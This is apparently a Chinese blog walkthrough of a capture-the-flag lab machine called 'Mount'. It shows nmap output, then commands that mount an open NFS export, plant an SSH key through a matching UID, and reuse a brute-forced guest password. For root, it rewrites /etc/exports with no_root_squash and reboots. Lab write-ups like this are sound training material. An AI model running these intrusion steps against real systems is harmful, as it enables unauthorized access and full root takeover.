Skip to main content

Mount靶机-maze

·525 words·3 mins
Mountnfs Mount
IIIIIIIIIIII
Author
IIIIIIIIIIII
A little bit about you
Table of Contents

Mount靶机-Maze
#

信息收集
#

NMAP扫描端口

└─# nmap 172.20.10.2 -sT -p- -sC     
Starting Nmap 7.92 ( https://nmap.org ) at 2025-09-10 02:27 EDT
Nmap scan report for 172.20.10.2
Host is up (0.00042s latency).
Not shown: 65526 closed tcp ports (conn-refused)
PORT      STATE SERVICE
22/tcp    open  ssh
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
79/tcp    open  finger
| finger: \x0D
| Welcome to Linux version 4.19.0-27-amd64 at Mount !\x0D
| 
|  02:27:19 up 3 min,  0 users,  load average: 0.04, 0.01, 0.00
| \x0D
|_No one logged on.\x0D
80/tcp    open  http
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      37701/udp   mountd
|   100005  1,2,3      45501/tcp6  mountd
|   100005  1,2,3      48026/udp6  mountd
|   100005  1,2,3      51187/tcp   mountd
|   100021  1,3,4      34593/tcp   nlockmgr
|   100021  1,3,4      43233/tcp6  nlockmgr
|   100021  1,3,4      48578/udp   nlockmgr
|   100021  1,3,4      49562/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs_acl
34593/tcp open  nlockmgr
35695/tcp open  unknown
51187/tcp open  mountd
60235/tcp open  unknown
MAC Address: 08:00:27:8D:16:16 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 12.42 seconds

NFS 服务(2049/111/51187 端口):高风险
NFS(网络文件系统)是最需关注的服务,若配置不当易导致 文件泄露或未授权访问:

风险:若 NFS 共享目录未限制客户端 IP、未设置权限(如 no_root_squash 配置),攻击者可能挂载共享目录,读取 / 修改敏感文件(如系统配置、用户数据)。
验证建议:执行 showmount -e 172.20.10.2(需本地安装 nfs-common 工具),查看 NFS 共享的目录及权限配置。

showmount -e 172.20.10.2

showmount -e 172.20.10.2
Export list for 172.20.10.2:
/home/ll104567 *
发现可以挂载“允许所有客户端访问” 的方式共享(* 表示无 IP 限制)

挂载拿到用户shell
# 

mkdir -p /mnt/nfs_test

mount -t nfs 172.20.10.2:/home/ll104567 /mnt/nfs_test

cd nfs_test 
cd: 权限不够: nfs_test  提示权限不够就创建这个用户进去放入ssh密码登录
useradd -u 6666 nfs_user

 mkdir .ssh
 echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChJ31EeTjZIw5tz/8b2Ma6XyrjI6+FSUfbnWRF7HA6/pMtgTbZGPhKXRzdigHq2NY40KSz7xpeDvpZEbdCjpCiimXfwgALaZpI/GxftyA4C9yWoSQxR7jdK8dWAurA9rnoPnwrOO8F14rg2P2vknrtR70eIklAwbuDvJ8Aq9Ai5tMPaiOx2uJAYRWYRgOd/jP4WhZ8nF88N+E963xFf/Bf37AMV4SVujvasubsmM96t7fOqEBgzyK+xTClVqhzzGKhcr5AfYDvemDnffXEC3Ff+cdkXpW8HhX8FrK6D2HzwpOIN/8hypJNkGssXOZ9E4rTWWoY84VtPvceYMUI7xV44VskmZMLYrBAxfPDzEJV/HHKX1xQXwsHg7WiSRntApPS3BfeMr8ZqJTSBqoTVAnoMAuClPy1Vm1c+mlzvjlCbBBLfLEWNvuslzR9rQMFpMwLN3PoBhyGZ5+gv94QPbicLhNuLdU10KD5dHLtWUoWIGOu2RqtcjjKul+fT62BPy8= root@kali" > authorized_keys
$ ls -al
总用量 12
drwxrwxr-x 2 nfs_user nfs_user 4096  9月 10 02:33 .
drwx------ 3 nfs_user nfs_user 4096  9月 10 02:32 ..
-rw-rw-r-- 1 nfs_user nfs_user  563  9月 10 02:33 authorized_keys

登录 拿到ll用户

└─# ssh ll104567@172.20.10.2 -i /root/.ssh/id_rsa 
Linux Mount 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Aug 20 23:46:24 2025 from 192.168.3.94
ll104567@Mount:~$ 
ll104567@Mount:~$ ls
ll104567@Mount:~$ ls -al

这里发现还有个用户guest爆破得到密码lalala获得user.txt

[22][ssh] host: 172.20.10.2   login: guest   password: lalala

提权root
#

这里发现可以重启并且我们对exports这NFC关键文件可以写就可以连用来提权

l104567@Mount:~$ sudo -l
Matching Defaults entries for ll104567 on Mount:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ll104567 may run the following commands on Mount:
    (ALL) NOPASSWD: /sbin/reboot
    
    ll104567@Mount:~$ ls -al /etc/exports 
-rw-rw---- 1 root ll104567 49 Sep 10 04:03 /etc/exports
ll104567@Mount:~$

修改文件内容为

/root *(rw,sync,no_root_squash,no_subtree_check)

sudo /sbin/reboot 就会应用配置然后我们重新挂载

┌──(root㉿kali)-[/mnt/nfs_test2]
└─# showmount -e 172.20.10.2
Export list for 172.20.10.2:
/root *
mkdir -p /mnt/nfs_test3 
                                                                                                 
┌──(root㉿kali)-[/mnt/nfs_test2]
└─# mount -t nfs 172.20.10.2:/home/ll104567 /mnt/nfs_test3
Created symlink '/run/systemd/system/remote-fs.target.wants/rpc-statd.service' → '/usr/lib/systemd/system/rpc-statd.service'.
mount.nfs: mounting 172.20.10.2:/home/ll104567 failed, reason given by server: No such file or directory
                                                                                                 
┌──(root㉿kali)-[/mnt/nfs_test2]
└─# mount -t nfs 172.20.10.2:/root /mnt/nfs_test3
                                                                                                 
┌──(root㉿kali)-[/mnt/nfs_test2]
└─# cd /mnt/nfs_test3
                                                                                                 
┌──(root㉿kali)-[/mnt/nfs_test3]
└─# ls    
root.txt

Related

vmware-esxi-vscenter-靶场vulntarget-o
·219 words·2 mins
Vmware Esxi Vscenter
poppips-mazasec
·1025 words·5 mins
Linux
Editor-htb
·260 words·2 mins
Xwiki
fluffy-htb
·930 words·5 mins
Windows ESC16
K8s-3-靶场渗透
·218 words·2 mins
K8s